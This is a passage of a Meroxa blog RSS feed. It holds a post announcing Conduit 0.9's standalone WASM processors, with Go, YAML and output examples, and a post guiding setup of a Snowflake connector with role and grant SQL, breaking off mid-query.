&lt;hr&gt;</content:encoded></item><item><title><![CDATA[Introducing Conduit 0.9: Revolutionizing Data Processing]]></title><description><![CDATA[Discover the revolutionary Conduit 0.9 update, enhancing data processing with standalone processors and advanced capabilities for seamless manipulation and efficiency. Explore now.]]></description><link>https://meroxa.com/blog/introducing-conduit-0.9-revolutionizing-data-processing-with-enhanced-processors</link><guid isPermaLink="false">https://meroxa.com/blog/introducing-conduit-0.9-revolutionizing-data-processing-with-enhanced-processors</guid><dc:creator><![CDATA[Simon Lawrence]]></dc:creator><pubDate>Fri, 22 Mar 2024 16:19:19 GMT</pubDate><content:encoded>&lt;p&gt;We&apos;re thrilled to unveil the latest version of Conduit! This update, Conduit 0.9, marks a significant milestone in our journey, offering more flexibility and power in data processing than ever before. The development of this release focused on incorporating valuable user feedback, particularly around enhancing processor functionality, to provide a seamless and more efficient experience.&lt;/p&gt;
&lt;h2&gt;Elevating Data Processing with Advanced Processor Capabilities&lt;/h2&gt;
&lt;p&gt;In previous versions of Conduit, manipulating records was confined to our built-in processors or custom code within the pipeline configuration file, using a JavaScript processor. This approach, while functional, was not the most user-friendly or flexible. Taking your feedback to heart, we&apos;ve completely overhauled our processor framework in Conduit 0.9, introducing support for standalone processors. This update opens up new possibilities for data manipulation, allowing you to write custom processors in the language of your choice, thanks to our new support for Web Assembly (WASM) processors.&lt;/p&gt;
&lt;h3&gt;Introducing Web Assembly Processors for Flexible Data Processing&lt;/h3&gt;
&lt;p&gt;The flexibility to process data with Web Assembly Processors is a game-changer. For instance, utilizing Go with our new &lt;a href=&quot;https://github.com/ConduitIO/conduit-processor-sdk&quot;&gt;conduit-processor-sdk&lt;/a&gt; allows for unprecedented adaptability in processing methods. However, the choice of language is yours, with options like C#, Rust, or Kotlin—all compatible with Web Assembly. For a deeper dive into implementing standalone processors, our &lt;a href=&quot;https://conduit.io/docs/processors/standalone/how-it-works&quot;&gt;&quot;How it works&quot;&lt;/a&gt; guide provides comprehensive insights.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Example: Creating a Simple Processor in Go&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Below is a straightforward example of a Go-based processor. This custom processor adds a &lt;code class=&quot;language-text&quot;&gt;processed&lt;/code&gt; field to each record, showcasing the ease of enhancing data with Conduit 0.9.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;//go:build wasm    package main    import (      &quot;context&quot;        &quot;github.com/conduitio/conduit-commons/opencdc&quot;      sdk &quot;github.com/conduitio/conduit-processor-sdk&quot;  )    func main() {      sdk.Run(sdk.NewProcessorFunc(          sdk.Specification{Name: &quot;simple-processor&quot;, Version: &quot;v1.0.0&quot;},          func(ctx context.Context, record opencdc.Record) (opencdc.Record, error) {              record.Payload.After.(opencdc.StructuredData)[&quot;processed&quot;] = true              return record, nil          },      ))  &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Compiling our New Processor&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;After writing your processor, a simple compilation step prepares it for integration into your Conduit pipeline. The process involves setting specific environment variables for the Go compiler to target WASM. &lt;code class=&quot;language-text&quot;&gt;GOARCH=wasm GOOS=wasip1&lt;/code&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;GOARCH=wasm GOOS=wasip1 go build -o simple-processor.wasm main.go    &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Once compiled, your &lt;code class=&quot;language-text&quot;&gt;simple-processor.wasm&lt;/code&gt; is ready to be deployed within Conduit by copying to the &lt;code class=&quot;language-text&quot;&gt;./processors&lt;/code&gt;directory next to our &lt;code class=&quot;language-text&quot;&gt;conduit&lt;/code&gt; binary.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Using our new processor in a pipeline&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Utilizing the new processor involves referencing it within your Conduit pipeline configuration, as demonstrated in our example layout.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Simple-Processor@2x.png&quot; alt=&quot;Simple-Processor@2x&quot;&gt;&lt;/p&gt;
&lt;p&gt;We’ll have the generator connector create records with the form:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;{    &quot;addr&quot;: &quot;string c5c5d54b-e380-48e0-b24b-444b760a66f3&quot;,    &quot;id&quot;: 1884616843,    &quot;name&quot;: &quot;string 246def2a-ac48-416c-b3e7-01fcb77c52a2&quot;,    &quot;zip&quot;: &quot;string 2f1f462e-1dfa-4066-a1d7-03370227d672&quot;  }  &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Our processor will add a new &lt;code class=&quot;language-text&quot;&gt;processed&lt;/code&gt; field and then we’ll write that out to a file.&lt;/p&gt;
&lt;p&gt;Here’s the Conduit pipeline configuration file for actually creating the pipeline in Conduit.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;version: 2.2  pipelines:    - id: gen-to-file      status: running      description: &quot;A demo pipeline with wasm processor&quot;      connectors:        - id: source-generator          type: source          plugin: builtin:generator          name: gen-source          settings:            recordCount: &apos;3&apos;            format.type: structured            format.options: id:int,name:string,addr:string,zip:string        - id: example.out          type: destination          plugin: builtin:file          settings:            path: ./example.out      processors:        - id: add-processed-field          plugin: standalone:simple-processor  &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You can see the new processor referenced in the processor&apos;s section of the pipeline.yaml&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;processors:    - id: add-processed-field      plugin: standalone:simple-processor  &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When we start Conduit and check the &lt;code class=&quot;language-text&quot;&gt;./example.out&lt;/code&gt; file can see the processed records with the newly added &lt;code class=&quot;language-text&quot;&gt;&quot;processed&quot;&lt;/code&gt; field.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Not Just Standalone: Improvements to Built-in Processors&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The introduction of standalone processors isn&apos;t the only highlight of Conduit 0.9. We&apos;ve also made substantial enhancements to our built-in processors, making them more robust and user-friendly.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Exploring the Enhanced Built-in Processors&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Here’s an example of a pipeline that uses two built-in processors. One processor removes a field and the other adds metadata to the record.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;version: 2.0  pipelines:    - id: gen-to-file      status: running      description: &quot;A demo pipeline with two built-in processors&quot;      connectors:        - id: source-generator          type: source          plugin: builtin:generator          name: gen-source          settings:            recordCount: &apos;3&apos;            format.type: structured            format.options: id:int,name:string,addr:string,zip:string        - id: log          type: destination          plugin: builtin:log      processors:        - id: remove-zip          plugin: builtin:field.exclude          settings:            fields: &quot;.Payload.After.zip&quot;        - id: metadata-processed          plugin: builtin:field.set          settings:            field: .Metadata.processed            value: &quot;true&quot;  &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When we run the pipeline and check the Conduit logs there are three records printed. Our generator is creating records with &lt;code class=&quot;language-text&quot;&gt;id&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;name&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;addr&lt;/code&gt;, and &lt;code class=&quot;language-text&quot;&gt;zip&lt;/code&gt; fields but at the end of our pipeline, you can see that the record doesn’t have the &lt;code class=&quot;language-text&quot;&gt;.Payload.After.zip&lt;/code&gt; field. Additionally, there’s now a &lt;code class=&quot;language-text&quot;&gt;processed&lt;/code&gt; field in the &lt;code class=&quot;language-text&quot;&gt;.Metadata&lt;/code&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;{    &quot;key&quot;: &quot;ZGIwYzBlMTQtMDY4Yy00MTQ3LWExOWUtYjBmMGYwMjc1OWUy&quot;,    &quot;metadata&quot;: {      &quot;conduit.source.connector.id&quot;: &quot;gen-to-file:source-generator&quot;,      &quot;opencdc.readAt&quot;: &quot;1711053477220315000&quot;,      &quot;opencdc.version&quot;: &quot;v1&quot;,      &quot;processed&quot;: &quot;true&quot;    },    &quot;operation&quot;: &quot;create&quot;,    &quot;payload&quot;: {      &quot;after&quot;: {        &quot;addr&quot;: &quot;string 6932464d-d940-4e27-8139-f0175289fd24&quot;,        &quot;id&quot;: 843620792,        &quot;name&quot;: &quot;string 549efa80-62f4-465d-9399-0129607fa40f&quot;      },      &quot;before&quot;: null    },    &quot;position&quot;: &quot;MzYzY2RlZTItZTlmNi00NWE4LWE2MDUtOGE0MGU5M2U1YmVk&quot;  }  &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Just by themselves, our built-in processors provide a powerful set of primitives you can use to create sophisticated data processing pipelines.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Get Started with Conduit 0.9&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We invite you to experience the advancements in Conduit 0.9 firsthand. Our &lt;a href=&quot;https://conduit.io/docs/introduction/getting-started/&quot;&gt;getting started guide&lt;/a&gt; makes it easy to set up Conduit on your machine, allowing you to explore the new processor capabilities and more.&lt;/p&gt;
&lt;h3&gt;We Value Your Feedback&lt;/h3&gt;
&lt;p&gt;The new standalone processor support in Conduit 0.9 represents a major step forward in our commitment to improving data processing ergonomics. We&apos;re eager to see the innovative ways you&apos;ll utilize these capabilities.&lt;/p&gt;
&lt;p&gt;Your feedback is crucial to us. Whether it&apos;s through posting issues, sharing thoughts in discussions, or connecting with us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt; or &lt;a href=&quot;https://twitter.com/conduitio&quot;&gt;Twitter&lt;/a&gt;, we&apos;re all ears.&lt;/p&gt;
&lt;p&gt;For a comprehensive overview of all the new features and improvements, don&apos;t forget to check out the full release notes on the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.9.0&quot;&gt;Conduit Changelog&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Streamlining Your Analytics: Building an Efficient Snowflake Data Pipeline for Upserts and Deletes]]></title><description><![CDATA[Discover the new Snowflake Conduit Connector, your solution for real-time data management challenges in Snowflake. This comprehensive guide covers everything from setup to performance insights, equipping you to implement real-time upserts and deletes seamlessly. Enhance your Snowflake experience with this essential tool for advanced data operations.]]></description><link>https://meroxa.com/blog/streamlining-your-analytics-building-an-efficient-snowflake-data-pipeline-for-upserts-and-deletes</link><guid isPermaLink="false">https://meroxa.com/blog/streamlining-your-analytics-building-an-efficient-snowflake-data-pipeline-for-upserts-and-deletes</guid><dc:creator><![CDATA[Anna Khachaturova]]></dc:creator><pubDate>Thu, 21 Mar 2024 22:57:47 GMT</pubDate><content:encoded>&lt;p&gt;Snowflake&apos;s rise to prominence in data-driven companies is undeniable, yet many users encounter a common bottleneck: the challenge of real-time data ingestion, particularly when it comes to upserts and deletes. Snowflake&apos;s native data ingest services, such as Snowpipe and Snowpipe Streaming, fall short of offering these crucial capabilities directly. This is where the innovative Snowflake Conduit Connector steps in, bridging this critical gap by enabling safe and real-time upserts or marking records for deletion in Snowflake. This article takes a closer look at the development journey of the Snowflake Conduit Connector, offers a guide on setting it up, evaluates its data stream performance, and previews future enhancements.&lt;/p&gt;
&lt;h2&gt;Key Points&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Performance of the Snowflake Conduit Connector&lt;/li&gt;
&lt;li&gt;Covering the gap of features that Snowflake doesn&apos;t offer&lt;/li&gt;
&lt;li&gt;How easily to deploy the connector&lt;/li&gt;
&lt;li&gt;Our journey on building this connector&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Filling the Feature Gap with Snowflake Conduit Connector&lt;/h3&gt;
&lt;p&gt;Snowflake&apos;s architecture revolutionized data warehousing with its cloud-native approach, but its real-time data manipulation capabilities needed a boost. The Snowflake Conduit Connector is designed to extend Snowflake&apos;s functionality, allowing for real-time data upserts and deletions, features eagerly awaited by many Snowflake users. This connector not only enhances Snowflake&apos;s capabilities but also ensures data integrity and timely data updates, critical for operational and analytical workloads.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Setting Up the Snowflake Conduit Connector: A Step-by-Step Guide&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The Snowflake Conduit Connector empowers users to seamlessly integrate real-time data upserts and deletes into their Snowflake data warehouse. This guide provides a comprehensive walkthrough for setting up the Snowflake Conduit Connector, ensuring you can quickly leverage its capabilities to enhance your data management processes.&lt;/p&gt;
&lt;h3&gt;Step 1: Prerequisites&lt;/h3&gt;
&lt;p&gt;Before starting the setup process, ensure you have:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;An active Snowflake account with administrative privileges.&lt;/li&gt;
&lt;li&gt;Conduit installed locally&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Step 2: Configuring Snowflake for the Conduit Connector&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Create a Role and User for Conduit:&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Log into your Snowflake account.&lt;/li&gt;
&lt;li&gt;Execute SQL commands to create a dedicated role and user for Conduit, granting the necessary permissions for reading, writing, and managing data.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; ROLE conduit_connector_role&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;USER&lt;/span&gt; conduit_connector_user PASSWORD &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;&amp;lt;strong_password&gt;&apos;&lt;/span&gt; DEFAULT_ROLE &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; conduit_connector_role&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;GRANT&lt;/span&gt; ROLE conduit_connector_role &lt;span class=&quot;token keyword&quot;&gt;TO&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;USER&lt;/span&gt; conduit_connector_user&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Assign Permissions:&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Assign permissions to the Conduit connector role to access the specific database and tables where upserts and deletes will be performed.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;GRANT&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;USAGE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;ON&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;DATABASE&lt;/span&gt; my_database &lt;span class=&quot;token keyword&quot;&gt;TO&lt;/span&gt; ROLE conduit_connector_role&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;GRANT&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;USAGE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;ON&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;SCHEMA&lt;/span&gt; my_database&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;my_schema &lt;span class=&quot;token keyword&quot;&gt;TO&lt;/span&gt; ROLE conduit_connector_role&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;GRANT&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;INSERT&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;UPDATE&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;DELETE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;ON&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;ALL&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TABLES&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;IN&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;SCHEMA&lt;/span&gt; my_database&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;my_schema &lt;span class=&quot;token keyword&quot;&gt;TO&lt;/span&gt; ROLE conduit_connector_role&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Step 3: Setting Up the Conduit Connector&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Log into Conduit:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Access your Conduit dashboard using your credentials.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/3dfeceea39ed5b847b2bea99ed2d3aca/4abbf/access-conduit-dashboard.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 59.00000000000001%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABE0lEQVR42uWTO04DMRCGfVNAkAaJhygoaMIJaCgpuAdcgAtkvV4USIMIr334sfZ6iX7sAYeICIRIiaVPHv0e/zOWxuzk9AxxOdeh6zxhrYNSBs5+aosk3bQWj1WNRht435PG9g+H6F9naKSG0i20CUlPJbgYY/rwDBk0GcwTMaesGxhtcXs/xfnlBa44R+c8nbONwR6C39wwIqVBWckQG7ShWxu6T9SNoqLOhw5NLKbnhSJsfWt3yTDGL2VNcXzWIrGINu963NOdHw3VxzO/Jv+Gbw3/yn80XNvcge9nqGpJI7EqbLB9QD9FxVEIM9eGX7AK7Oh4iMnkDqK4QS6ukY04OC8ozkVBZDwnRtkySc+4IN4AFTyE+UautJcAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Screenshot of the Conduit Dashboard showing Pipelines&quot;
        title=&quot;&quot;
        src=&quot;/static/3dfeceea39ed5b847b2bea99ed2d3aca/5a190/access-conduit-dashboard.png&quot;
        srcset=&quot;/static/3dfeceea39ed5b847b2bea99ed2d3aca/772e8/access-conduit-dashboard.png 200w,
/static/3dfeceea39ed5b847b2bea99ed2d3aca/e17e5/access-conduit-dashboard.png 400w,
/static/3dfeceea39ed5b847b2bea99ed2d3aca/5a190/access-conduit-dashboard.png 800w,
/static/3dfeceea39ed5b847b2bea99ed2d3aca/c1b63/access-conduit-dashboard.png 1200w,
/static/3dfeceea39ed5b847b2bea99ed2d3aca/29007/access-conduit-dashboard.png 1600w,
/static/3dfeceea39ed5b847b2bea99ed2d3aca/4abbf/access-conduit-dashboard.png 3088w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Create a New Connector:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Navigate to the &quot;Connectors&quot; section and click &quot;Create Connector.&quot;&lt;/li&gt;
&lt;li&gt;Select &quot;&lt;a href=&quot;https://meroxa.com/connectors/source/snowflake/&quot;&gt;Snowflake&lt;/a&gt;&quot; as the connector type.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Configure Connector Settings:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Fill in the connection details for your Snowflake instance, including account name, user, password, and any specific configurations related to your setup.&lt;/li&gt;
&lt;li&gt;Specify the database and schema where the connector should perform creates, upserts and deletes.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Map Data Streams:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Define the data streams that the connector will manage. Specify the source data and how it maps to the target tables in Snowflake.&lt;/li&gt;
&lt;li&gt;Configure the upsert and delete operations by defining the key columns and conditions.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Step 4: Launching the Connector&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Review and Save:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Review all settings to ensure they are correct.&lt;/li&gt;
&lt;li&gt;Save the connector configuration.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Activate Connector:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Once the connector is configured, activate it to start processing data.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/a9cc15886f0fc21848e2e8fa7cd728fa/db806/activate-connector.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 53%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAAAsTAAALEwEAmpwYAAABAklEQVR42tWRX0+DMBTF+f5fyGQ6MMM9+IITGJQ/g+HcwkDAAG1ZQtHDmhCMxvhq80tze3rOzW2qFGXFGBdCfPx5DcPQ9z12JU0zzjshcBaU8qahTUsp44x3YFRaKAwFY52kpbwoyrpuxzDaoF/d0t3+NcvLNCtssjMsz7CIHyXnvEizN8eLnm3P3PrAcvytG9pOoFTVu5wZw/th8nI4AdsNYN1YhARxclXgnsIANVAopfIlGB6qYbpPJpl8KHCcK3O+hC0n+O74hf8bZjLcXS5emDhe7PqxG+wl5CcmXYnwk+f8eDxFcayvH5fag3q/vlN1cKuu5khlvNL0xXJ1s9A+ARmTRJ6hhWXmAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Screenshot of the conduit dashboard showing the connector page with an open dropdown showing the &amp;quot;Start Pipeline&amp;quot; button&quot;
        title=&quot;&quot;
        src=&quot;/static/a9cc15886f0fc21848e2e8fa7cd728fa/5a190/activate-connector.png&quot;
        srcset=&quot;/static/a9cc15886f0fc21848e2e8fa7cd728fa/772e8/activate-connector.png 200w,
/static/a9cc15886f0fc21848e2e8fa7cd728fa/e17e5/activate-connector.png 400w,
/static/a9cc15886f0fc21848e2e8fa7cd728fa/5a190/activate-connector.png 800w,
/static/a9cc15886f0fc21848e2e8fa7cd728fa/c1b63/activate-connector.png 1200w,
/static/a9cc15886f0fc21848e2e8fa7cd728fa/29007/activate-connector.png 1600w,
/static/a9cc15886f0fc21848e2e8fa7cd728fa/db806/activate-connector.png 3424w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Monitor the connector&apos;s performance and logs through the Conduit dashboard.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Step 5: Monitoring and Maintenance&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Regularly check the connector&apos;s logs for any errors or performance issues.&lt;/li&gt;
&lt;li&gt;Adjust configurations as necessary to optimize data processing.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Performance Insights: Streamlining Your Data Flow&lt;/h3&gt;
&lt;p&gt;One of the core advantages of the Snowflake Conduit Connector is its performance in handling data streams. Our development efforts were centered on ensuring the connector could manage high volumes of data with minimal latency, making real-time data ingestion, upserts, and deletes a reality. Here, we delve into performance metrics, showcasing the efficiency and reliability of the connector in various scenarios and highlighting how it stands up to the demands of modern data-driven operations.&lt;/p&gt;
&lt;h3&gt;Our Development Journey: Challenges and Victories&lt;/h3&gt;
&lt;p&gt;Developing the Snowflake Conduit Connector was a journey marked by both challenges and breakthroughs. From conceptualization to launch, our team navigated through intricate technical hurdles, all while keeping the user&apos;s needs at the forefront. We uncovered how other platforms produced results with missing data.&lt;/p&gt;
&lt;p&gt;Some of the issues encountered during dev - As Snowflake provides no direct way of doing upserts we had to bench-test our own workarounds for uploading data. We made several attempts :&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Uploading data via csv file to Snowflake, copying data from csv into temporary table, then merging it into final.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Uploading data via Avro file to Snowflake, copying data from Avro file into temp table, and then merging into final.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Sample Copy and Merge Query:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;COPY &lt;span class=&quot;token keyword&quot;&gt;INTO&lt;/span&gt; mytable_temp &lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; &lt;span class=&quot;token variable&quot;&gt;@mystage&lt;/span&gt; FILES &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;myfile.avro.gz&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
			 FILE_FORMAT &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;TYPE&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; avro&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; MATCH_BY_COLUMN_NAME &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; CASE_INSENSITIVE &lt;span class=&quot;token keyword&quot;&gt;PURGE&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;TRUE&lt;/span&gt;
			 
